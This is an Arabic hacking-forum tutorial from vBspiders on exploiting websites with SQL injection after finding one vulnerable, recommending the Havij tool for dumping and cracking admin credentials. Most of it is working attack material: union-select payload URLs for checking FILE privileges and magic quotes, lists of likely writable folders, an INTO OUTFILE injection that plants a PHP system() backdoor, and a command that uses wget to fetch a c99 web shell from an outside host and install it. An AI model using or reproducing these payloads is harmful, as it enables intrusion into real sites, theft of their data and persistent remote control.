:: vBspiders Professional Network :: - دليـــل المخترق: ماتفعل بعد معـــرفة [موقع] مصاب بثغـــرات ::SQL Injection::

http://www6.0zz0.com/2010/12/23/16/337772047.gif

"اهلا وسهلا بكم اعضاء شبكة العناكب الاحترافية"

اليوم موضعي ماتفعل بعد ماتجد موقع مصاب بلــثغرات
:: SQL In Jection::
طبعا كثرت ثغرات الحقن وكثرت أنواعها اليوم حبيت ان انزل موضوع جديد بسبب قلة نشاطي في هذة الايام
والسبب معروف هو المدرسة
وحبيت ان يستفاد المتدى وحتى المتوسط من هذا الوضوع
وبدون مقدمة طوية نبدأ بالموضوع..’
http://img822.imageshack.us/img822/6821/2vbjxfte.gif
في البداية سوف ينقسم الموضوع الى :
أ-الاختراق العادي والحقن عن طريق الاومر
ب-الاختراق العادي والحقن عن طريق البرامج
ج-الاختراق المتقدم والوصول الى نقاط الضعف في البرنامج ورفع سكريب خبيث علية
1-ماتحتاج من أجل هذة الخطوة

اولا :يجب ان يوجد لديك تصريح شرح تصريح التعامل مع الملفات FILE privilege
ثانيا : لمعرفه هل الماجيك كوتس of &on
ثالثا : طرق لمعرفة المسارات تبع السيرفر او جلب الاخطاء الداله على المسارات عشان نقدر نحقن
رابعا : طرق معرفه المجلدات المصرحه
2- بدأ الاستغلال وتلغيم الموقع ورفع الشل
http://www6.0zz0.com/2010/12/23/16/110224753.gif
بسم الله ونتوكل على الله ,
أ-الاختراق العادي والحقن عن طريق الاومر
في البداية الحقن العادي يتم فية اخذ الموقع المصاب وتبدأ انتة تحقن وطبعا الحقن
وطبق الأومر الخاصة بلقاعدة المصابة بلسكريب المنصب على الموقع

طيب احنة في منتدى دورة خاصة لثغرات sql
وهذا الرابط الدورة .

كود PHP:

   http://vbspiders.com/vb/forumdisplay.php?f=236

http://www6.0zz0.com/2010/12/23/16/110224753.gif
ب-الاختراق العادي والحقن عن طريق البرامج
يتم هنا الاختراق الموقع المصاب بلثغرات الحقن عن طريق برامج والحقيقة البرامج جميلة وقوية بنفس الوقت وانة دائما اعتمد عليها طبعا لان
لحقن باليد متعب لكن يجب ان تتعلم ماهية دينامكية الاختراق عن طريق ثغرات sql
نبدأ بأقوى برنامج هو برنامج
havij 1.14
http://www6.0zz0.com/2010/12/23/16/882244586.png

كود PHP:

   http://itsecteam.com/en/projects/project1_page2.htm

لتحميل البرنامج اضغطو على
Havij v1.14 Free

طيب شرح البرنامج في هذا الفديوا :
* فحص الموقع اذا هو مصاب او لا
* استخراج الجداول واختيار الجدول الهدف [ الادمن او اليوزر ] على حسب النتائج
* استخراج اعمدة الجدول الهدف
* استخراج بيانات العمود الهدف
* فك الباسوورد المشفر بمقياس MD5
* استخراج مسار لوحة تحكم الادمن
* دخول لوحة التحكم

http://www6.0zz0.com/2010/12/23/16/882244586.png

كود PHP:

   http://www.mediafire.com/?776x2axz39pku8l

http://www6.0zz0.com/2010/12/23/16/110224753.gif
ج-الاختراق المتقدم والوصول الى نقاط الضعف في البرنامج ورفع سكريب خبيث علية
في هذة المرحلة سوف يتم الى رفع الشل عن طريق ثغرات sql
وطبعا هون لازم تستخدم عقلك شوية وتنتبة لان هذة المرحلة جميلة جدا وقوى حيث مواقع المصاب بلثغرات الحقن كثير اكثر من شعر راسي ولازم تستخدم عقلك في الوصول الى نقاط ضعفها ورفع شل .
يوجد اثنين من التعليمات اسمهما
into outfile & into dumpfile
في هذا التعليمين
السابقتان في لغة القواعد لحفظ محتوى جدول داخل ملف
وكلتا التعليمتان تؤدي نفس الغرض بمعنى ايهما استخدمت بتقضى حاجتك
وعن طريقها نقدر نحقن كود ملغم بثغره او مركز رفع صغير او نعدل بيانات..
http://www6.0zz0.com/2010/12/23/16/110224753.gif
1-ماتحتاج من أجل هذة الخطوة
سوف يبدأ العمل ألجد ونبدأ الاستغلال الثغرات طبعا الاستغلال الحقيقي ...
وبجب ان تنبة في هذة الخطوات ..
طلعا الخطوات راح نبدأ بها ونشرحها واحدة وحدة
والخطوات هي /
1- لديك تصريح للتعامل مع الملفات
2- معرفة هل الماجك كوتس اوف ام أون
3- معرفة مسارك على السيرفر
4- معرفة مجلد مصرح بلتصريح 777
5- بدأ الاستغلال وتلغيم ورفع الشل
http://www6.0zz0.com/2010/12/23/16/110224753.gif
اولا :يجب ان يوجد لديك تصريح شرح تصريح التعامل مع الملفات FILE privilege
طيب شو هذا التصريح !
هذا
FILE privilege
يعني تصريح التعامل مع الملفات من خلال القواعد
او ملف الامتياز لمستخدم القاعده و اذا كنت تملك هذا التصريح يعني انك تملك كتابه ملفات ولديك ملف امتياز وبا التالي تحقن شل او كود

كيف نعرف ان لدينا هذا التصريح ؟
اولا نعرف اصدار القاعدة عن طريق أمر

كود PHP:

    "version()"

كود PHP:

   http://virus.com/vq.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9--

المواقع لي تستخدم قاعدة بيانات
الاصدار mysql 5
يوجد جدول اسمه
user_privileges
العمود
is_grantable
وفي هذا الجدول تجد
نشوف هل هل لدينا صلاحيه او اذن لحقن شل او كتابة ملف بستخدام هذا العامود
كافة الامتيازات للمستخدم القاعده
او نقدر نقول ان في هذا الجدول
كافة الصلاحيات للمستخدم القاعده

لذلك نستخدم الامر التالي لمعرفة ان لدينا هذا التصريح ,

كود PHP:

   http://virus.com/vq.php?id=-10+union+select+1,is_grantable,3,4,5,6,7,8,9+from+information_schema.user_privileges--

is_grantable ( في حال نبي نحقن كود لازم يكون نعم اي مسموح لي با الكتابه امتيازات المستخدم وهو يعني هل لديك
grantee وهو يعني اسم مستخدم قاعدة البيانات
privilege_type تحديدا وهو يعني المسموح لك كمستخدم للقاعده ماهو
طيب اذا طلع لنا
YES
اذان لدينا هذا التصريح

يعني نقدر نحقن كود ان شاء الله
ونمتلك امتيازات المستخدم للكتابه

........
طيب
في الاصدار الرابع
mysql 4
كيف اعرف ان لدي امتيازات لمستخدم القاعده او كيف اعرف انه استطيع ان احقن شل او اكتب كود
نجرب نعمل نفس الطريقه با الاصدار الخامس على الاصدار الرابع لكن بشكل مختلف
اول شي عامود ملف الامتياز في الاصدار 4
file_priv

يعني هل لديك صلاحيه او اذن لكتابه file_priv

وراح يكون يا نعم او لا اي تملك التصاريح او لا تملك او تملك الامتياز او لا تملك او يمكنك كتابه كود او لا يمكنك
نشوف

كود PHP:

   http://www.virus.com/vq.php?id=-10+union+select+1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

اذا طلع لنا
Y
يعني نقدر نحقن او نكتب كود

http://www6.0zz0.com/2010/12/23/16/110224753.gif
ثانيا : لمعرفه هل الماجيك كوتس of &on

يوجد لدينا طريقتين
الطريقه الاولى
عن طريق دالة :
load_file('/')
مثال

كود PHP:

   http://www.virus.com/vq.php?id=2+union+select+1,load_file('/') ,3,4,5,6,7--

لو اعطى خطا يعني اون لو ما اعطى يعني اوف

الطريقه الثانيه
'1'='1'--
لو طلع خطا او وجت في الصفحه التالي
\'1\'=\'1\'
هذا يعني الماجيك اون لو ما طلع لي مثل اللرمز فوق يعني اوف
مثال

كود PHP:

   http://www.virus.com/vq.php?story=2 '1'='1'--

http://www6.0zz0.com/2010/12/23/16/110224753.gif
ثالثا : طرق لمعرفة المسارات تبع السيرفر او جلب الاخطاء الداله على المسارات عشان نقدر نحقن
طبعا لازم نعرف المسار لي احنة فية لازم حتى نشوف مجلد مصرح مشان نقدر نحقن او نكتب ملف خبيث

لديك عدة طرق
اولا
نحاول نطلع اخطاء
المهم انت وطريتقك تحاول تجيب مسارات او اخطاء
وايظا يمديك تروح تضع الموقع في قوقل وتحاول تطلع اخطاء ومسارات
يوجد طرقة لمعرف المسار في الأصدار الخامس
نستخدم
@@datadir
او نجرب نطلع اخطا
جرب التالي
0***8242; AND 1=’0
ماطلع مسار
or
'1'='1'
ايظا ما راح يطلع
يعني تجرب وتحاول تعرف المسارات
او نروح قوقل مثلا نشوف الاخطاء
site:virus.com
http://www6.0zz0.com/2010/12/23/16/110224753.gif
رابعا : طرق معرفه المجلدات المصرحه

باقي علينا نجيب مجلدات مصرحه 777 عشان نقدر نحقن
يوجد عدة طرق لاكن راح اذكر الطرق المهمة والقوية وانتة جرب بعد واستخدم عقلك وطرقك في الاختراق ..
أولا
لدي هذا المجدات لي وجدتها وان شاء الله تفيدكم ويتكون على الاغلب مصرحة بـــ 777
http://virus.com/templates_compiled/
http://virus.com/templates_c/
http://virus.com/templates/
http://virus.com/temporary/
http://virus.com/images/
http://virus.com/temp/
http://virus.com/files/

ثانيا
يوجد برنامج
IntelliTamper
في هذا البرنامج تستطيع اظهار جميع المجدات في السيرفر ولة شروحات كثيرة في النت
في طرق كثيرة ايظا جرب وتشوف وأبحث ولاتكون كسول ’
..........
وتجرب تحقن على المجلدات حتى يضبط معك واحد مصرح
777
كيف اعرف انه مصرح هذا بتعرفه لمن بيحقن معك الكود فقط
اذا لم يحقن يعني مش مصرح او احيان بيطلع لك كتابه بتقول لك
Can't create/write to file
http://www6.0zz0.com/2010/12/23/16/110224753.gif
2- بدأ الاستغلال وتلغيم الموقع ورفع الشل

طيب لي فهمنا لي فوق يجب ان يكون لديك /
1-يجب ان يكون لديك اذن او صلاحيه كمستخدم للقاعده للكتابه
2-يجب ان يكون الماجيك كوتس اوف
3-يجب ان تعرف المسارات حتى تقدر تحقن او تقرى ملفات
4-يجب ان يكون لديك مجلدات مصرحه777
الان نستخدم الامر التالي اذا كانت جميع الخيارات لي فوق صحيح وشغالة .
نحاول نلغم بكود بي اتش بي فيه ثغره كوماند او اي ثغره اخرى

كود PHP:

   <?system($_get***91;"vq"***93;);?>

المتغير المصاب هو vqhackers

كود PHP:

  
http://www.virus.com/vq.php/id=-10+union+select+1,2,3,'<?system($_GET***91;"vq"***93;);?>',5,6,+into+outfile+'/home/virus/public_html/hacker/vbspiders.php

'/*

طيب لي فوق نأتي ونحلل /

كود PHP:

   http://www.virus.com/vq.php/id=-10

الموقع المصاب

كود PHP:

  
,'<?system($_GET***91;"vq"***93;);?>',

الكود لتلغيم بثغراة تنفيذ الاومر cmd

كود PHP:

   ,+into+outfile+'/home/virus/public_html/hacker/vbspiders.php'/*

أمر لكتابة على ملف vbspiders.php
الموجود في المسار التالي ...
مع العلم ان مجلد hackers مصرح بتصريح
777

طيب الان نذهب الى ملف المصاب لي تم تلغيمة .
www.virus.com/hackers/vbspiders.php?vq=wget www.vbspiders.com/shell/c99.txt?;mv special.txt dd.php
ونفذ هذا الامر وشرح الامر.

كود PHP:

    www.virus.com/hackers/vbspiders.php?vq=

مسار الملف المصاب بثغرات الكومند مع الدالة
"vq"

كود PHP:

   wget www.vbspiders.com/shell/c99.txt

أمر يقوم بسحب الملف الشل من أحد المواقع المرفوع عليها شل بصيغة نص

كود PHP:

   mv c99.txt hih.php

امر تحويل الشل من صيغة
txt >>> php
مع مراعة تغير اسمة الى
hih.php

ونفتح الشل لي رفع ويكون ع هذا المسار

كود PHP:

    www.virus.com/hackers/hih.php

ويفتح معاك الشل بأذن الله
http://www6.0zz0.com/2010/12/23/16/110224753.gif
وهذا شرح لكيفية رفع الشل عن طريق هذة الثغرات .
http://www6.0zz0.com/2010/12/23/16/882244586.png

كود PHP:

   http://www.4shared.com/file/61186587/bfd39abe/into_outfile_by_hussin_X.html

http://stashbox.org/996391/image003v.png

الحقوق / :rules:
ViRuS Qalaa
VBspiders TeaM

في أمان الله
أهداء الموضوع الى /
Cyber Code - Dr.NaNo - HaCkEr'S KiNg
مجروح هكر
والى جميع الاعضاء شبكة العناكب

ونلتقي دائما في مواضيع جديدة
SEE U